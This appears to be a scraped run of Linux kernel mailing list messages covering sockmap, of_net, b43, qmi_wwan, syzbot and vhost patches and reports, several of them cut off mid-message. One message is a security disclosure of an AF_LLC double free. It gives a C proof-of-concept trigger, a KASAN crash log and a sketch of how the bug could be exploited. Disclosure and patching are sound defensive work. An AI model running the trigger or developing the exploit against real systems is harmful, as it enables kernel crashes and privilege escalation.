[PATCH bpf-next] bpf: sockmap: initialize sg table entries properly
When CONFIG_DEBUG_SG is set, sg->sg_magic is initialized to SG_MAGIC, when sg table is initialized using sg_init_table(). Magic is checked while navigating the scatterlist. We hit BUG_ON when magic check is failed. Fixed following things: - Initialization of sg table in bpf_tcp_sendpage() was missing, initialized it using sg_init_table() - bpf_tcp_sendmsg() initializes sg table using sg_init_table() before entering the loop, but further consumed sg entries are initialized using memset. Fixed it by replacing memset with sg_init_table() in function bpf_tcp_push() Signed-off-by: Prashant Bhole --- kernel/bpf/sockmap.c | 11 +++ 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/kernel/bpf/sockmap.c b/kernel/bpf/sockmap.c index 69c5bccabd22..8a848a99d768 100644 --- a/kernel/bpf/sockmap.c +++ b/kernel/bpf/sockmap.c @@ -312,7 +312,7 @@ static int bpf_tcp_push(struct sock *sk, int apply_bytes, md->sg_start++; if (md->sg_start == MAX_SKB_FRAGS) md->sg_start = 0; - memset(sg, 0, sizeof(*sg)); + sg_init_table(sg, 1); if (md->sg_start == md->sg_end) break; @@ -763,10 +763,14 @@ static int bpf_tcp_sendpage(struct sock *sk, struct page *page, lock_sock(sk); - if (psock->cork_bytes) + if (psock->cork_bytes) { m = psock->cork; - else + sg = &m->sg_data[m->sg_end]; + } else { m = &md; + sg = m->sg_data; + sg_init_table(sg, MAX_SKB_FRAGS); + } /* Catch case where ring is full and sendpage is stalled. */ if (unlikely(m->sg_end == m->sg_start && @@ -774,7 +778,6 @@ static int bpf_tcp_sendpage(struct sock *sk, struct page *page, goto out_err; psock->sg_size += size; - sg = &m->sg_data[m->sg_end]; sg_set_page(sg, page, size, offset); get_page(page); m->sg_copy[m->sg_end] = true; -- 2.14.3
Security Vulnerability in AF_LLC (Double Free)
Hi, We would like to report a security vulnerability in AF_LLC. The credit should be given as such: "An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program." == # AF_LLC DOUBLE FREE ## affected versions The bug seems to be present in the Linux kernel from the latest version to 2.6.39.4 and even earlier versions. ## summary LLC sockets can only be created with CAP_NET_RAW capability. Setsockopt() with SO_BINDTODEVICE is necessary to setup sk->sk_bound_dev_if so that bind() won't fail as well as llc_ui_sendmsg() when checking that llc->addr is initialized. Then after connecting and sending a message, the code leads to llc_build_and_send_pkt. The error can be spotted in llc_conn_state_process(): ``` ... out_kfree_skb: kfree_skb(skb); out_skb_put: kfree_skb(skb); return rc; } ``` The end of the function see 2 consecutive free on the skb which causes a UAF first followed by a double free as seen in the crash log: ``` void kfree_skb(struct sk_buff *skb) { if (!skb_unref(skb)) return; trace_kfree_skb(skb, __builtin_return_address(0)); __kfree_skb(skb); } ``` Exploiting the double free on the struct sk_buff itself is not easy due to that fact that it belongs to its own slab. However, a sk_buff has a kmalloc-ed buffer which is allocated and deallocated side by side with it (cf. https://xairy.github.io/blog/2016/cve-2016-2384). It's kind of similar to 2 consecutive double free. We want to target the 2nd free to free any other object with function pointers (in the general kmalloc) so that we can abuse the crafted UAF. A good target could be to free a skb's buffer and control the destructor_arg in skb_shared_info just like the writeup in the above link. ## POC ``` #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include struct sockaddr_llc { short sllc_family; short sllc_arphrd; unsigned char sllc_test; unsigned char sllc_xid; unsigned char sllc_ua; unsigned char sllc_sap; unsigned char sllc_mac[6]; unsigned char __pad[2]; }; void test() { int fd = socket(AF_LLC, SOCK_STREAM, 0); char output[32] = "lo"; socklen_t len; setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10); struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2}; bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc)); struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2}; connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc)); char msg[0x10] = ""; send(fd, msg, 0x10, 0); } int main() { test(); return 0; } ``` ## crash log ``` [ 23.142123] BUG: KASAN: use-after-free in kfree_skb+0x298/0x2f0 [ 23.143012] Read of size 4 at addr 8801093d1124 by task poc/207 [ 23.143742] [ 23.143892] CPU: 0 PID: 207 Comm: poc Not tainted 4.15.0+ #5 [ 23.144396] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.11.0-0-g63451fca13-prebuilt.qemu-project.org 04/01/2014 [ 23.145452] Call Trace: [ 23.145694] dump_stack+0xcc/0x16c [ 23.147098] print_address_description+0x73/0x290 [ 23.147534] kasan_report+0x277/0x360 [ 23.148204] kfree_skb+0x298/0x2f0 [ 23.149829] llc_conn_state_process+0x12d/0x1260 [ 23.150536] llc_build_and_send_pkt+0x195/0x240 [ 23.151135] llc_ui_sendmsg+0x78b/0x1280 [ 23.155716] sock_sendmsg+0xc5/0x100 [ 23.156413] SYSC_sendto+0x33a/0x580 [ 23.163517] entry_SYSCALL_64_fastpath+0x24/0x87 [ 23.164241] RIP: 0033:0x400cfd [ 23.164694] RSP: 002b:7ffd3d1f4bd8 EFLAGS: 0246 [ 23.164698] [ 23.165766] Allocated by task 207: [ 23.166397] kasan_kmalloc+0xa0/0xd0 [ 23.167071] kmem_cache_alloc_node+0x100/0x1c0 [ 23.167829] __alloc_skb+0xe2/0x700 [ 23.168457] alloc_skb_with_frags+0x10a/0x690 [ 23.169174] sock_alloc_send_pskb+0x735/0x920 [ 23.170156] llc_ui_sendmsg+0x427/0x1280 [ 23.170960] sock_sendmsg+0xc5/0x100 [ 23.171547] SYSC_sendto+0x33a/0x580 [ 23.172280] entry_SYSCALL_64_fastpath+0x24/0x87 [ 23.173460] [ 23.173763] Freed by task 207: [ 23.174261] kasan_slab_free+0x71/0xc0 [ 23.174843] kmem_cache_free+0x77/0x1e0 [ 23.175410] kfree_skbmem+0x1a1/0x1d0 [ 23.175987] kfree_skb+0x12f/0x2f0 [ 23.176541] llc_conn_state_process+0x120/0x1260 [ 23.177406] llc_build_and_send_pkt+0x195/0x240 [ 23.178051] llc_ui_sendmsg+0x78b/0x1280 [ 23.178647] sock_sendmsg+0xc5/0x100 [ 23.179175] SYSC_sendto+0x33a/0x580 [ 23.179702] entry_SYSCALL_64_fastpath+0x24/0x87 [ 23.180368] [ 23.180603] The buggy address belongs to the object at 8801093d1040 [ 23.180603] which belongs to the cache skbuff_head_cache of size 232 [ 23.182503] The buggy address is located 228 bytes inside of [ 23.182503] 232-byte region [8801093d1040, 8801093d1128) [ 23.184255] The buggy address belongs to the page: [ 23.184976] page:ea00042
[PATCH v2] of_net: Implement of_get_nvmem_mac_address helper
It's common practice to store MAC addresses for network interfaces into nvmem devices. However the code to actually do this in the kernel lacks, so this patch adds of_get_nvmem_mac_address() for drivers to obtain the address from an nvmem cell provider. This is particulary useful on devices where the ethernet interface cannot be configured by the bootloader, for example because it's in an FPGA. Tested by adapting the cadence macb driver to call this instead of of_get_mac_address(). Signed-off-by: Mike Looijmans --- v2: Use of_nvmem_cell_get to avoid needing the assiciated device Use void* instead of char* Add devicetree binding doc Documentation/devicetree/bindings/net/ethernet.txt | 2 + drivers/of/of_net.c| 47 ++ include/linux/of_net.h | 6 +++ 3 files changed, 55 insertions(+) diff --git a/Documentation/devicetree/bindings/net/ethernet.txt b/Documentation/devicetree/bindings/net/ethernet.txt index 2974e63..cfc376b 100644 --- a/Documentation/devicetree/bindings/net/ethernet.txt +++ b/Documentation/devicetree/bindings/net/ethernet.txt @@ -10,6 +10,8 @@ Documentation/devicetree/bindings/phy/phy-bindings.txt. the boot program; should be used in cases where the MAC address assigned to the device by the boot program is different from the "local-mac-address" property; +- nvmem-cells: phandle, reference to an nvmem node for the MAC address; +- nvmem-cell-names: string, should be "mac-address" if nvmem is to be used; - max-speed: number, specifies maximum speed in Mbit/s supported by the device; - max-frame-size: number, maximum transfer unit (IEEE defined MTU), rather than the maximum frame size (there's contradiction in the Devicetree diff --git a/drivers/of/of_net.c b/drivers/of/of_net.c index d820f3e..8999745 100644 --- a/drivers/of/of_net.c +++ b/drivers/of/of_net.c @@ -7,6 +7,7 @@ */ #include #include +#include #include #include #include @@ -80,3 +81,49 @@ const void *of_get_mac_address(struct device_node *np) return of_get_mac_addr(np, "address"); } EXPORT_SYMBOL(of_get_mac_address); + +/** + * Search the device tree for a MAC address, by calling of_get_mac_address + * and if that doesn't provide an address, fetch it from an nvmem provider + * using the name 'mac-address'. + * On success, copies the new address is into memory pointed to by addr and + * returns 0. Returns a negative error code otherwise. + * @dev: Pointer to the device containing the device_node + * @addr: Pointer to receive the MAC address using ether_addr_copy() + */ +int of_get_nvmem_mac_address(struct device_node *np, void *addr) +{ + const void *mac; + struct nvmem_cell *cell; + size_t len; + int ret; + + mac = of_get_mac_address(np); + if (mac) { + ether_addr_copy(addr, mac); + return 0; + } + + cell = of_nvmem_cell_get(np, "mac-address"); + if (IS_ERR(cell)) + return PTR_ERR(cell); + + mac = nvmem_cell_read(cell, &len); + + nvmem_cell_put(cell); + + if (IS_ERR(mac)) + return PTR_ERR(mac); + + if (len < 6 || !is_valid_ether_addr(mac)) { + ret = -EINVAL; + } else { + ether_addr_copy(addr, mac); + ret = 0; + } + + kfree(mac); + + return ret; +} +EXPORT_SYMBOL(of_get_nvmem_mac_address); diff --git a/include/linux/of_net.h b/include/linux/of_net.h index 9cd72aa..90d81ee 100644 --- a/include/linux/of_net.h +++ b/include/linux/of_net.h @@ -13,6 +13,7 @@ struct net_device; extern int of_get_phy_mode(struct device_node *np); extern const void *of_get_mac_address(struct device_node *np); +extern int of_get_nvmem_mac_address(struct device_node *np, void *addr); extern struct net_device *of_find_net_device_by_node(struct device_node *np); #else static inline int of_get_phy_mode(struct device_node *np) @@ -25,6 +26,11 @@ static inline const void *of_get_mac_address(struct device_node *np) return NULL; } +static inline int of_get_nvmem_mac_address(struct device_node *np, void *addr) +{ + return -ENODEV; +} + static inline struct net_device *of_find_net_device_by_node(struct device_node *np) { return NULL; -- 1.9.1
Re: [QUESTION] Mainline support for B43_PHY_AC wifi cards
On 24/03/18 00:01, Rafał Miłecki wrote: > On 23 March 2018 at 15:09, Juri Lelli wrote: > > On 23/03/18 14:43, Rafał Miłecki wrote: > >> Hi, > >> > >> On 23 March 2018 at 10:47, Juri Lelli wrote: > >> > I've got a Dell XPS 13 9343/0TM99H (BIOS A15 01/23/2018) mounting a > >> > BCM4352 802.11ac (rev 03) wireless card and so far I've been using it on > >> > Fedora with broadcom-wl package (which I believe installs Broadcom's STA > >> > driver?). It works good apart from occasional hiccups after suspend. > >> > > >> > I'd like to get rid of that dependency (you can understand that it's > >> > particularly annoying when testing mainline kernels), but I found out > >> > that support for my card is BROKEN in mainline [1]. Just to see what > >> > happens, I forcibly enabled it witnessing that it indeed crashes like > >> > below as Kconfig warns. :) > >> > > >> > bcma: bus0: Found chip with id 0x4352, rev 0x03 and package 0x00 > >> > bcma: bus0: Core 0 found: ChipCommon (manuf 0x4BF, id 0x800, rev 0x2B, > >> > class 0x0) > >> > bcma: bus0: Core 1 found: IEEE 802.11 (manuf 0x4BF, id 0x812, rev 0x2A, > >> > class 0x0) > >> > bcma: bus0: Core 2 found: ARM CR4 (manuf 0x4BF, id 0x83E, rev 0x02, > >> > class 0x0) > >> > bcma: bus0: Core 3 found: PCIe Gen2 (manuf 0x4BF, id 0x83C, rev 0x01, > >> > class 0x0) > >> > bcma: bus0: Core 4 found: USB 2.0 Device (manuf 0x4BF, id 0x81A, rev > >> > 0x11, class 0x0) > >> > bcma: Unsupported SPROM revision: 11 > >> > bcma: bus0: Invalid SPROM read from the PCIe card, trying to use > >> > fallback SPROM > >> > bcma: bus0: Using fallback SPROM failed (err -2) > >> > bcma: bus0: No SPROM available > >> > bcma: bus0: Bus registered > >> > b43-phy0: Broadcom 4352 WLAN found (core revision 42) > >> > b43-phy0: Found PHY: Analog 12, Type 11 (AC), Revision 1 > >> > b43-phy0: Found Radio: Manuf 0x17F, ID 0x2069, Revision 4, Version 0 > >> > BUG: unable to handle kernel NULL pointer dereference at > >> > > >> > >> This isn't really useful without a full backtrace. > > > > Sure. I cut it here because I didn't expect people to debug what is > > already known to be broken (but still it seemed to carry useful > > information about the hw). :) > > Please paste the remaining part if you still got it. Sure, please find it below. Thanks! - Juri --->8--- [ 60.732180] cfg80211: Loading compiled-in X.509 certificates for regulatory database [ 60.733048] cfg80211: Loaded X.509 cert 'sforshee: 00b28ddf47aef9cea7' [ 60.733303] platform regulatory.0: Direct firmware load for regulatory.db failed with error -2 [ 60.733305] cfg80211: failed to load regulatory.db [ 61.047277] bcma: bus0: Found chip with id 0x4352, rev 0x03 and package 0x00 [ 61.047302] bcma: bus0: Core 0 found: ChipCommon (manuf 0x4BF, id 0x800, rev 0x2B, class 0x0) [ 61.047316] bcma: bus0: Core 1 found: IEEE 802.11 (manuf 0x4BF, id 0x812, rev 0x2A, class 0x0) [ 61.047340] bcma: bus0: Core 2 found: ARM CR4 (manuf 0x4BF, id 0x83E, rev 0x02, class 0x0) [ 61.047366] bcma: bus0: Core 3 found: PCIe Gen2 (manuf 0x4BF, id 0x83C, rev 0x01, class 0x0) [ 61.047380] bcma: bus0: Core 4 found: USB 2.0 Device (manuf 0x4BF, id 0x81A, rev 0x11, class 0x0) [ 61.107321] bcma: Unsupported SPROM revision: 11 [ 61.107325] bcma: bus0: Invalid SPROM read from the PCIe card, trying to use fallback SPROM [ 61.107326] bcma: bus0: Using fallback SPROM failed (err -2) [ 61.107327] bcma: bus0: No SPROM available [ 61.109830] bcma: bus0: Bus registered [ 61.242068] b43-phy0: Broadcom 4352 WLAN found (core revision 42) [ 61.242481] b43-phy0: Found PHY: Analog 12, Type 11 (AC), Revision 1 [ 61.242487] b43-phy0: Found Radio: Manuf 0x17F, ID 0x2069, Revision 4, Version 0 [ 61.242909] BUG: unable to handle kernel NULL pointer dereference at [ 61.242916] IP: (null) [ 61.242919] PGD 0 P4D 0 [ 61.242924] Oops: 0010 [#1] PREEMPT SMP PTI [ 61.242926] Modules linked in: b43(+) bcma mac80211 cfg80211 ssb mmc_core rfcomm fuse nf_conntrack_netbios_ns nf_conntrack_broadcast xt_CT ip6t_rpfilter ip6t_REJECT nf_reject_ipv6 xt_conntrack ip_set nfnetlink ebtable_nat ebtable_broute bridge stp llc ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_raw ip6table_security iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack libcrc32c iptable_mangle iptable_raw iptable_security ebtable_filter ebtables ip6table_filter ip6_tables cmac bnep sunrpc intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic snd_hda_intel btusb snd_hda_codec uvcvideo btrtl btbcm btintel snd_hda_core bluetooth snd_hwdep videobuf2_vmalloc snd_seq [ 61.242989] videobuf2_memops videobuf2_v4l2 iTCO_wdt snd_seq_device snd_pcm videobuf2_common iTCO_vendor_support dell_laptop dell_wmi irqbypass videodev wmi_bmof sparse_keymap dell_smbios intel_cstate dell_
[PATCHv2] net/usb/qmi_wwan.c: Add USB id for lt4120 modem
This is needed to support the modem found in HP EliteBook 820 G3. Signed-off-by: Torsten Hilbrich --- drivers/net/usb/qmi_wwan.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c index 76ac48095c29..e3ef0a0c715d 100644 --- a/drivers/net/usb/qmi_wwan.c +++ b/drivers/net/usb/qmi_wwan.c @@ -1240,6 +1240,7 @@ static const struct usb_device_id products[] = { {QMI_FIXED_INTF(0x413c, 0x81b6, 8)},/* Dell Wireless 5811e */ {QMI_FIXED_INTF(0x413c, 0x81b6, 10)}, /* Dell Wireless 5811e */ {QMI_FIXED_INTF(0x03f0, 0x4e1d, 8)},/* HP lt4111 LTE/EV-DO/HSPA+ Gobi 4G Module */ + {QMI_FIXED_INTF(0x03f0, 0x9d1d, 1)},/* HP lt4120 Snapdragon X5 LTE */ {QMI_FIXED_INTF(0x22de, 0x9061, 3)},/* WeTelecom WPD-600N */ {QMI_FIXED_INTF(0x1e0e, 0x9001, 5)},/* SIMCom 7230E */ {QMI_QUIRK_SET_DTR(0x2c7c, 0x0125, 4)}, /* Quectel EC25, EC20 R2.0 Mini PCIe */ -- 2.11.0
Re: possible deadlock in handle_rx
On 2018年03月26日 08:01, syzbot wrote: Hello, syzbot hit the following crash on upstream commit cb6416592bc2a8b731dabcec0d63cda270764fc6 (Sun Mar 25 17:45:10 2018 +) Merge tag 'dmaengine-fix-4.16-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/vkoul/slave-dma syzbot dashboard link: https://syzkaller.appspot.com/bug?extid=7f073540b1384a614e09 So far this crash happened 4 times on upstream. C reproducer: https://syzkaller.appspot.com/x/repro.c?id=6506789075943424 syzkaller reproducer: https://syzkaller.appspot.com/x/repro.syz?id=5716250550337536 Raw console output: https://syzkaller.appspot.com/x/log.txt?id=5142038655795200 Kernel config: https://syzkaller.appspot.com/x/.config?id=-5034017172441945317 compiler: gcc (GCC) 7.1.1 20170620 IMPORTANT: if you fix the bug, please add the following tag to the commit: Reported-by: syzbot+7f073540b1384a614...@syzkaller.appspotmail.com It will help syzbot understand when the bug is fixed. See footer for details. If you forward the report, please keep this part and the footer. WARNING: possible recursive locking detected 4.16.0-rc6+ #366 Not tainted vhost-4248/4760 is trying to acquire lock: (&vq->mutex){+.+.}, at: [<3482bddc>] vhost_net_rx_peek_head_len drivers/vhost/net.c:633 [inline] (&vq->mutex){+.+.}, at: [<3482bddc>] handle_rx+0xeb1/0x19c0 drivers/vhost/net.c:784 but task is already holding lock: (&vq->mutex){+.+.}, at: [<4de72f44>] handle_rx+0x1f5/0x19c0 drivers/vhost/net.c:766 other info that might help us debug this: Possible unsafe locking scenario: CPU0 lock(&vq->mutex); lock(&vq->mutex); *** DEADLOCK *** May be due to missing lock nesting notation Yes, it's a missing of nesting notation. Will post a patch soon. Thanks
Re: [RFC PATCH V2 0/8] Packed ring for vhost
cc Jens, Tiwei and Wei Thanks On 2018年03月26日 11:38, Jason Wang wrote: Hi all: This RFC implement packed ring layout. The code were tested with pmd implement by Jens at http://dpdk.org/ml/archives/dev/2018-January/089417.html. Minor change was needed for pmd codes to kick virtqueue since it assumes a busy polling backend. Test were done between localhost and guest. Testpmd (rxonly) in guest reports 2.4Mpps. Testpmd (txonly) repots about 2.1Mpps. Notes: The event suppression /indirect descriptor support is complied test only because of lacked driver support. Changes from V1: - Refactor vhost used elem code to avoid open coding on used elem - Event suppression support (compile test only). - Indirect descriptor support (compile test only). - Zerocopy support. - vIOMMU support. - SCSI/VSOCK support (compile test only). - Fix several bugs For simplicity, I don't implement batching or other optimizations. Please review. Thanks Jason Wang (8): vhost: move get_rx_bufs to vhost.c vhost: hide used ring layout from device vhost: do not use vring_used_elem vhost_net: do not explicitly manipulate vhost_used_elem vhost: vhost_put_user() can accept metadata type virtio: introduce packed ring defines vhost: packed ring support vhost: event suppression for packed ring drivers/vhost/net.c| 138 ++- drivers/vhost/scsi.c | 62 +-- drivers/vhost/vhost.c | 818 ++--- drivers/vhost/vhost.h | 46 ++- drivers/vhost/vsock.c | 42 +- include/uapi/linux/virtio_config.h | 9 + include/uapi/linux/virtio_ring.h | 32 ++ 7 files changed, 921 insertions(+), 226 deletions(-)
[RFC PATCH V2 1/8] vhost: move get_rx_bufs to vhost.c
Move get_rx_bufs() to vhost.c and rename it to vhost_get_rx_bufs(). This helps to hide vring internal layout from specific device implementation. Packed ring implementation will benefit from this. Signed-off-by: Jason Wang --- drivers/vhost/net.c | 83 ++- drivers/vhost/vhost.c | 78 +++ drivers/vhost/vhost.h | 7 + 3 files changed, 88 insertions(+), 80 deletions(-) diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c index 8139bc7..57dfa63 100644 --- a/drivers/vhost/net.c +++ b/drivers/vhost/net.c @@ -658,83 +658,6 @@ static int vhost_net_rx_peek_head_len(struct vhost_net *net, struct sock *sk) return len; } -/* This is a multi-buffer version of vhost_get_desc, that works if - * vq has read descriptors only. - * @vq - the relevant virtqueue - * @datalen- data length we'll be reading - * @iovcount - returned count of io vectors we fill - * @log- vhost log - * @log_num- log offset - * @quota - headcount quota, 1 for big buffer - * returns number of buffer heads allocated, negative on error - */ -static int get_rx_bufs(struct vhost_virtqueue *vq, - struct vring_used_elem *heads, - int datalen, - unsigned *iovcount, - struct vhost_log *log, - unsigned *log_num, - unsigned int quota) -{ - unsigned int out, in; - int seg = 0; - int headcount = 0; - unsigned d; - int r, nlogs = 0; - /* len is always initialized before use since we are always called with -* datalen > 0. -*/ - u32 uninitialized_var(len); - - while (datalen > 0 && headcount < quota) { - if (unlikely(seg >= UIO_MAXIOV)) { - r = -ENOBUFS; - goto err; - } - r = vhost_get_vq_desc(vq, vq->iov + seg, - ARRAY_SIZE(vq->iov) - seg, &out, - &in, log, log_num); - if (unlikely(r < 0)) - goto err; - - d = r; - if (d == vq->num) { - r = 0; - goto err; - } - if (unlikely(out || in <= 0)) { - vq_err(vq, "unexpected descriptor format for RX: " - "out %d, in %d\n", out, in); - r = -EINVAL; - goto err; - } - if (unlikely(log)) { - nlogs += *log_num; - log += *log_num; - } - heads[headcount].id = cpu_to_vhost32(vq, d); - len = iov_length(vq->iov + seg, in); - heads[headcount].len = cpu_to_vhost32(vq, len); - datalen -= len; - ++headcount; - seg += in; - } - heads[headcount - 1].len = cpu_to_vhost32(vq, len + datalen); - *iovcount = seg; - if (unlikely(log)) - *log_num = nlogs; - - /* Detect overrun */ - if (unlikely(datalen > 0)) { - r = UIO_MAXIOV + 1; - goto err; - } - return headcount; -err: - vhost_discard_vq_desc(vq, headcount); - return r; -} - /* Expects to be always run from workqueue - which acts as * read-size critical section for our kind of RCU. */ static void handle_rx(struct vhost_net *net) @@ -784,9 +707,9 @@ static void handle_rx(struct vhost_net *net) while ((sock_len = vhost_net_rx_peek_head_len(net, sock->sk))) { sock_len += sock_hlen; vhost_len = sock_len + vhost_hlen; - headcount = get_rx_bufs(vq, vq->heads + nheads, vhost_len, - &in, vq_log, &log, - likely(mergeable) ? UIO_MAXIOV : 1); + headcount = vhost_get_bufs(vq, vq->heads + nheads, vhost_len, + &in, vq_log, &log, + likely(mergeable) ? UIO_MAXIOV : 1); /* On error, stop handling until the next kick. */ if (unlikely(headcount < 0)) goto out; diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c index 1b3e8d2d..c57df71 100644 --- a/drivers/vhost/vhost.c +++ b/drivers/vhost/vhost.c @@ -2098,6 +2098,84 @@ int vhost_get_vq_desc(struct vhost_virtqueue *vq, } EXPORT_SYMBOL_GPL(vhost_get_vq_desc); +/* This is a multi-buffer version of vhost_get_desc, that works if + * vq has read descriptors only. + * @vq - the relevant virtqueue + * @datalen- data length we'll be reading + * @iovcount - returned count of io vectors we fill + * @log- vhost log + * @log_num- log offset + * @qu
[RFC PATCH V2 0/8] Packed ring for vhost
Hi all: This RFC implement packed ring layout. The code were tested with pmd implement by Jens at http://dpdk.org/ml/archives/dev/2018-January/089417.html. Minor change was needed for pmd codes to kick virtqueue since it assumes a busy polling backend. Test were done between localhost and guest. Testpmd (rxonly) in guest reports 2.4Mpps. Testpmd (txonly) repots about 2.1Mpps. Notes: The event suppression /indirect descriptor support is complied test only because of lacked driver support. Changes from V1: - Refactor vhost used elem code to avoid open coding on used elem - Event suppression support (compile test only). - Indirect descriptor support (compile test only). - Zerocopy support. - vIOMMU support. - SCSI/VSOCK support (compile test only). - Fix several bugs For simplicity, I don't implement batching or other optimizations. Please review. Thanks Jason Wang (8): vhost: move get_rx_bufs to vhost.c vhost: hide used ring layout from device vhost: do not use vring_used_elem vhost_net: do not explicitly manipulate vhost_used_elem vhost: vhost_put_user() can accept metadata type virtio: introduce packed ring defines vhost: packed ring support vhost: event suppression for packed ring drivers/vhost/net.c| 138 ++- drivers/vhost/scsi.c | 62 +-- drivers/vhost/vhost.c | 818 ++--- drivers/vhost/vhost.h | 46 ++- drivers/vhost/vsock.c | 42 +- include/uapi/linux/virtio_config.h | 9 + include/uapi/linux/virtio_ring.h | 32 ++ 7 files changed, 921 insertions(+), 226 deletions(-) -- 2.7.4
[RFC PATCH V2 3/8] vhost: do not use vring_used_elem
Instead of depending on the exported vring_used_elem, this patch switches to use a new internal structure vhost_used_elem which embed vring_used_elem in itself. This could be used to let vhost to record extra metadata for the incoming packed ring layout. Signed-off-by: Jason Wang --- drivers/vhost/net.c | 19 ++- drivers/vhost/scsi.c | 10 +- drivers/vhost/vhost.c | 33 - drivers/vhost/vhost.h | 18 +++--- drivers/vhost/vsock.c | 6 +++--- 5 files changed, 45 insertions(+), 41 deletions(-) diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c index f821fcd..7ea2aee 100644 --- a/drivers/vhost/net.c +++ b/drivers/vhost/net.c @@ -337,10 +337,10 @@ static void vhost_zerocopy_signal_used(struct vhost_net *net, int j = 0; for (i = nvq->done_idx; i != nvq->upend_idx; i = (i + 1) % UIO_MAXIOV) { - if (vq->heads[i].len == VHOST_DMA_FAILED_LEN) + if (vq->heads[i].elem.len == VHOST_DMA_FAILED_LEN) vhost_net_tx_err(net); - if (VHOST_DMA_IS_DONE(vq->heads[i].len)) { - vq->heads[i].len = VHOST_DMA_CLEAR_LEN; + if (VHOST_DMA_IS_DONE(vq->heads[i].elem.len)) { + vq->heads[i].elem.len = VHOST_DMA_CLEAR_LEN; ++j; } else break; @@ -363,7 +363,7 @@ static void vhost_zerocopy_callback(struct ubuf_info *ubuf, bool success) rcu_read_lock_bh(); /* set len to mark this desc buffers done DMA */ - vq->heads[ubuf->desc].len = success ? + vq->heads[ubuf->desc].elem.len = success ? VHOST_DMA_DONE_LEN : VHOST_DMA_FAILED_LEN; cnt = vhost_net_ubuf_put(ubufs); @@ -422,7 +422,7 @@ static int vhost_net_enable_vq(struct vhost_net *n, static int vhost_net_tx_get_vq_desc(struct vhost_net *net, struct vhost_virtqueue *vq, - struct vring_used_elem *used_elem, + struct vhost_used_elem *used_elem, struct iovec iov[], unsigned int iov_size, unsigned int *out_num, unsigned int *in_num) { @@ -473,7 +473,7 @@ static void handle_tx(struct vhost_net *net) size_t hdr_size; struct socket *sock; struct vhost_net_ubuf_ref *uninitialized_var(ubufs); - struct vring_used_elem used; + struct vhost_used_elem used; bool zcopy, zcopy_used; mutex_lock(&vq->mutex); @@ -537,9 +537,10 @@ static void handle_tx(struct vhost_net *net) struct ubuf_info *ubuf; ubuf = nvq->ubuf_info + nvq->upend_idx; - vq->heads[nvq->upend_idx].id = - cpu_to_vhost32(vq, used.id); - vq->heads[nvq->upend_idx].len = VHOST_DMA_IN_PROGRESS; + vq->heads[nvq->upend_idx].elem.id = + cpu_to_vhost32(vq, used.elem.id); + vq->heads[nvq->upend_idx].elem.len = + VHOST_DMA_IN_PROGRESS; ubuf->callback = vhost_zerocopy_callback; ubuf->ctx = nvq->ubufs; ubuf->desc = nvq->upend_idx; diff --git a/drivers/vhost/scsi.c b/drivers/vhost/scsi.c index 654c71f..ac11412 100644 --- a/drivers/vhost/scsi.c +++ b/drivers/vhost/scsi.c @@ -67,7 +67,7 @@ struct vhost_scsi_inflight { struct vhost_scsi_cmd { /* Descriptor from vhost_get_vq_desc() for virt_queue segment */ - struct vring_used_elem tvc_vq_used; + struct vhost_used_elem tvc_vq_used; /* virtio-scsi initiator task attribute */ int tvc_task_attr; /* virtio-scsi response incoming iovecs */ @@ -441,7 +441,7 @@ vhost_scsi_do_evt_work(struct vhost_scsi *vs, struct vhost_scsi_evt *evt) struct vhost_virtqueue *vq = &vs->vqs[VHOST_SCSI_VQ_EVT].vq; struct virtio_scsi_event *event = &evt->event; struct virtio_scsi_event __user *eventp; - struct vring_used_elem used; + struct vhost_used_elem used; unsigned out, in; int ret; @@ -785,7 +785,7 @@ static void vhost_scsi_submission_work(struct work_struct *work) static void vhost_scsi_send_bad_target(struct vhost_scsi *vs, struct vhost_virtqueue *vq, - struct vring_used_elem *used, unsigned out) + struct vhost_used_elem *used, unsigned out) { struct virtio_scsi_cmd_resp __user *resp; struct virtio_scsi_cmd_resp rsp; @@ -808,7 +808,7 @@ vhost_scsi_handle_vq(struct vhost_scsi *vs, struct vhost_virtqueue *vq) struct virtio_scsi_cmd_req v_req; struct virtio_scsi_cmd_req_pi v_req_pi; struct vhost_scsi_cmd *cmd; - struct vring_used_elem used; + stru
[RFC PATCH V2 4/8] vhost_net: do not explicitly manipulate vhost_used_elem
Two helpers of setting/getting used len were introduced to avoid explicitly manipulating vhost_used_elem in zerocopy code. This will be used to hide used_elem internals and simplify packed ring implementation. Signed-off-by: Jason Wang --- drivers/vhost/net.c | 11 +-- drivers/vhost/vhost.c | 12 ++-- drivers/vhost/vhost.h | 5 + 3 files changed, 20 insertions(+), 8 deletions(-) diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c index 7ea2aee..7be8b55 100644 --- a/drivers/vhost/net.c +++ b/drivers/vhost/net.c @@ -337,9 +337,10 @@ static void vhost_zerocopy_signal_used(struct vhost_net *net, int j = 0; for (i = nvq->done_idx; i != nvq->upend_idx; i = (i + 1) % UIO_MAXIOV) { - if (vq->heads[i].elem.len == VHOST_DMA_FAILED_LEN) + if (vhost_get_used_len(vq, &vq->heads[i]) == + VHOST_DMA_FAILED_LEN) vhost_net_tx_err(net); - if (VHOST_DMA_IS_DONE(vq->heads[i].elem.len)) { + if (VHOST_DMA_IS_DONE(vhost_get_used_len(vq, &vq->heads[i]))) { vq->heads[i].elem.len = 